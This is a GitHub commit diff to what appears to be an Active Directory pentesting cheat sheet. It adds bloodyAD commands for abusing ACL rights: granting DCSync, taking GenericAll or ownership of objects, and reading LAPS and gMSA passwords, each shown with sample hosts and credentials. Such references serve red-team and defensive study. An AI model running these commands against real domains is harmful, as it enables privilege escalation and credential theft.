Update bloodyAD attacks

This commit is contained in:
CravateRouge 2022-09-06 19:13:34 +02:00 committed by GitHub
parent 191a72c57e
commit dad7362da6
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -2856,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
* On Linux: * On Linux:
```bash ```bash
# Give DCSync right to the principal identity # Give DCSync right to the principal identity
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2 bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2
# Remove right after DCSync # Remove right after DCSync
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2 bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False
``` ```
* WriteDACL on Group * WriteDACL on Group
@ -2867,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
net group "INTERESTING_GROUP" User1 /add /domain net group "INTERESTING_GROUP" User1 /add /domain
``` ```
Or
```powershell
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp
# Remove right
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
```
#### WriteOwner #### WriteOwner
@ -2875,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has
```powershell ```powershell
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
``` ```
Or
```powershell
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object
```
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group. This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
@ -2886,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies
```powershell ```powershell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
``` ```
Or for a given computer
```powershell
bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
```
#### ReadGMSAPassword #### ReadGMSAPassword
@ -2900,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword'
# Decode the data structure using the DSInternals module # Decode the data structure using the DSInternals module
ConvertFrom-ADManagedPasswordBlob $mp ConvertFrom-ADManagedPasswordBlob $mp
``` ```
Or
```powershell
python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
```
#### ForceChangePassword #### ForceChangePassword
@ -3953,4 +3972,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
* [The Phantom Credentials of SCCM: Why the NAA Wont Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) * [The Phantom Credentials of SCCM: Why the NAA Wont Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)